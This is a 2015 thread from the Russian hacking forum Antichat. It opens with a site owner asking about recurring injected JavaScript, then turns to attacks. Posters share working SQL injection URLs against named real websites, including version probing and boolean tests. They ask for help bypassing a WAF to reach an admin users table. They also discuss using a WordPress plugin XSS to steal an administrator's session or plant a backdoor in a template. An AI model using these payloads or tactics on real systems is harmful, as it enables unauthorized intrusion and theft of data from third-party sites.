ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.04.2015, 04:04
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Есть сайт на VDS, на нем стал появлятся какой-то левый js-код в некоторых js-файлах. PHP-работал от того же юзера, что и на FTP, то есть имел полные права. Я удалил код, поискал шеллы - не нашел ничего, сменил пасс на ftp. Через несколько дней код снова появился. Обшарил все - шеллов не нашел, но были мои шеллы, я подумал что как-то через них может заливается чувак, сменил пассы на них, удалил код, права поменял, теперь php работает как nobody, на js-файлы теперь доступа нет. Через несколько дней снова код появился, я в ахуе. Проверяю логи apache - нет ничего подозрительного, проверяю логи панели vds - тоже ничего подозрительного. И что характерно, права на js-файл сменены на 777, то есть кто-то имеет доступ к аккаунту, что и ftp. Как это возможно? Как найти паразита?
|
|
|
07.04.2015, 04:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
168184
Репутация:
40
|
|
Сообщение от попугай
попугай said:
↑
Есть сайт на VDS, на нем стал появлятся какой-то левый js-код в некоторых js-файлах. PHP-работал от того же юзера, что и на FTP, то есть имел полные права. Я удалил код, поискал шеллы - не нашел ничего, сменил пасс на ftp. Через несколько дней код снова появился. Обшарил все - шеллов не нашел, но были мои шеллы, я подумал что как-то через них может заливается чувак, сменил пассы на них, удалил код, права поменял, теперь php работает как nobody, на js-файлы теперь доступа нет. Через несколько дней снова код появился, я в ахуе. Проверяю логи apache - нет ничего подозрительного, проверяю логи панели vds - тоже ничего подозрительного. И что характерно, права на js-файл сменены на 777, то есть кто-то имеет доступ к аккаунту, что и ftp. Как это возможно? Как найти паразита? Очевидно, троян на вашем компьютере.
Айболитом не проверяли?
|
|
|
|
07.04.2015, 04:29
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от 5maks5
5maks5 said:
↑
Очевидно, троян на вашем компьютере.
Айболитом не проверяли? Троян теоретически возможен. Но windows security essentials молчит, да и в автозагрузке ничего подозрительного.
|
|
|
|
07.04.2015, 09:57
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
|
|
|
|
07.04.2015, 10:52
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Код:
Code:
http://www.amnh.org/ology/xCards/index.php?cardNumber=047%27+/*!and+(select+1+regexp+if(mid(@@version,1,1)=5,1,%27(%27))*/+--+ TRUE
http://www.amnh.org/ology/xCards/index.php?cardNumber=047%27+/*!and+(select+1+regexp+if(mid(@@version,1,1)=4,1,%27(%27))*/+--+ FALSE
Извращенский вариант, но имеет право на жизнь
// YaBtr: Regexp |
|
|
|
07.04.2015, 10:52
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
|
|
|
|
07.04.2015, 22:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Код:
Code:
https://www.maesen.com/sexshop/video_web.php?video=(6635)and(1)=1 - TRUE
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=(45)and(1)=1 - TRUE
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=(45)and(1)=0 - FALSE
https://www.maesen.com/sexshop/video_web.php?video=(6635)and(1)=0 - FALSE
не могу waf обойти, есть варианты?
PS
Код:
Code:
http://www.maesen.com/sexshop/video_web.php?video=(88886635)or+1=(SELECT+TOP+1+'id'+FROM+adminusuarios)
с information_schema.tables вытащить имя колонок с таблицы adminusuarios не получается, при использовании "_" пишет нет такой директори |
|
|
|
10.04.2015, 10:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
4520
Репутация:
0
|
|
Сканировал с помощью акунетикса: /wp-content/plugins/gd-star-rating/ajax.php
Нашел XSS, написано:
asr.84391.0.7.1428069437.10.0.30.3.3.0'"()&%prompt (973439)
Как его использовать? И даст ли это возможность доступа к бд ?
Раскручивать sql немного умею, но здесь не знаю куда копать.
|
|
|
|
10.04.2015, 11:33
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от larinvlad
larinvlad said:
↑
Сканировал с помощью акунетикса: /wp-content/plugins/gd-star-rating/ajax.php
Нашел XSS, написано:
asr.84391.0.7.1428069437.10.0.30.3.3.0'"()&%prompt (973439)
Как его использовать? И даст ли это возможность доступа к бд ?
Раскручивать sql немного умею, но здесь не знаю куда копать. Можете составить запрос который похищает сессию, и в парить его админу или составить запрос который автоматом вписывает бегдор в шаблон темплейта, но естественно это должен сделать авторизованный админ.
|
|
|
|
10.04.2015, 12:28
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
↑
Можете составить запрос который похищает сессию, и в парить его админу или составить запрос который автоматом вписывает бегдор в шаблон темплейта, но естественно это должен сделать авторизованный админ. Ты ему не помог, ему нужно раскрутить sql через xss .
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
